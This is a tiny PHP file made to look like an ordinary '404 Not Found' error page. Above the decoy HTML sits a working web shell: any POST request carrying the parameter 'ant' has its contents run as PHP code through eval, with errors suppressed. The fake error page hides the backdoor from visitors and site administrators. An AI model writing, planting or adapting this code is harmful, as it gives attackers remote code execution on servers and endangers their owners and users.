
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['ant'])) {
    @eval($_POST['ant']);
}
?>
<html>
    <head><title>404 Not Found</title></head>
    <body><h1>Not Found</h1></body>
</html>